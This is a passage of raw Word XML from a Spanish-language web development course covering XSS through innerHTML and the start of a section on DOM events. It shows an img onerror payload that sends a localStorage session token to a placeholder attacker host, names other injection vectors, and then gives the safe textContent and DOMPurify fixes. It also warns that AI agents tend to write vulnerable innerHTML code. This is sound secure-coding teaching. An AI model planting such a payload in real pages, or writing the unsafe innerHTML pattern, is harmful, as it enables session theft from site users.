          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.7.2 — La demostración</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="395A631B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Un catálogo que inserta reseñas así — el código más común de internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98C7AB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>contenedor.innerHTML = `&lt;p class="resena"&gt;${resena.texto}&lt;/p&gt;`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30C231" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Un usuario publica una reseña cuyo texto es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9687D3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="fetch('https://atacante.example/robar?t='+localStorage.token)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E58212" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando otro usuario abre el catálogo, el navegador intenta cargar una imagen de la dirección </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, que no existe. Al fallar dispara el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, que hace un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> al servidor del atacante llevándose el token de sesión. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Nadie hizo clic en nada, nadie vio nada raro: acabás de abrir un agujero con una línea que se ve perfectamente normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBACE8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc239319997"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.7.3 — Por qué filtrar la palabra «script» no alcanza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="5AE4F4E1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La reacción intuitiva es filtrar la palabra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. El dato es contraintuitivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C934936" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no ejecuta las etiquetas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se le insertan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Están excluidas por la especificación: si el ataque dependiera de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sería seguro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C5E8E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Pero sí ejecuta los manejadores de eventos en línea.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y decenas más funcionan perfectamente. Por eso el ejemplo usa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>lo que efectivamente funciona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Y la superficie es enorme: un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;svg onload&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;a href="javascript:..."&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;iframe srcdoc&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> con una expresión, y variantes que difieren entre navegadores. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Escribir un filtro propio es garantizar que va a faltar un caso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, y con uno ya está.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74416F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc239319998"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.7.4 — La regla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5FFEFC9D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">De ahí sale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>RN-F02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que el TPI enuncia en su sección 2.5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E0334" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="8" w:color="2E74B5"/>
        </w:pBdr>
        <w:ind w:left="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Todo dato no generado por el propio código de la vista se inserta con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sólo se admite con contenido pasado por </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOMPurify.sanitize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043DB883" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La versión segura es directa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC2C2A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const p = document.createElement("p");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F973866" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>p.className = "resena";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B8589" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>p.textContent = resena.texto;      // el marcado queda como texto visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1EA293" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>contenedor.appendChild(p);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FB806" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, la cadena del atacante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>aparece literalmente en pantalla como texto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: el usuario ve el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=...&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> escrito, tal cual, y no hay nada que ejecutar porque nunca se parseó como marcado. Cuando el requisito </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>exige</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML —negrita y cursiva en una descripción—, el TPI admite un solo camino: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que parsea el contenido, lo compara contra una lista de elementos y atributos permitidos y devuelve marcado limpio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5370C3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>import DOMPurify from "dompurify";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78198D40" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>contenedor.innerHTML = DOMPurify.sanitize(descripcion);</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6FE491EF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDECEA" w:fill="FDECEA"/>
          </w:tcPr>
          <w:p w14:paraId="074CDB19" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>OJO ACÁ: las tres cosas de esta sección</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7DF186" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Tres cosas, y la tercera es la que más te va a servir.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA7784C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Una.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Filtrar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> no sirve: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> ni siquiera lo ejecuta. Lo que ejecuta son los </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>onerror</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>onload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y compañía. Si tu filtro busca la palabra «script», estás protegiendo la puerta equivocada.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FBED48C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Dos.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> No escribas tu propio sanitizador. Nunca. DOMPurify lleva años de gente intentando romperlo y arreglando lo que encontraron; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>con que falle un solo caso ya está</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56ECF000" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Tres, y esta es la que importa:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> cuando le pidas a un agente de IA que te renderice una lista, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">te va a escribir </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> con un template literal adentro.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Es el patrón más común de internet, así que es lo que aprendió.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC014A1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Va a compilar. Va a andar. Y va a tener un XSS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E43C28" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Ese es el módulo entero resumido: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>el agente escribe lo más común, y lo más común no siempre es lo correcto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EBF8200" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc239319999"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.8 — Eventos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="03EAFD5D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc239320000"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.8.1 — Las tres fases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="69069793" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un evento no ocurre sólo en el elemento donde se originó: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>recorre el árbol en dos direcciones</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. Es el compromiso político de 4.2, visible en tu código todos los días.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3006"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="5BDACF1D"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CF1C47C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Fase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20B99F9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Recorrido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21E9F87" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cuándo se ejecuta un manejador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="40980E0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44879E7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Captura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B79821D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">De </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> hasta el elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
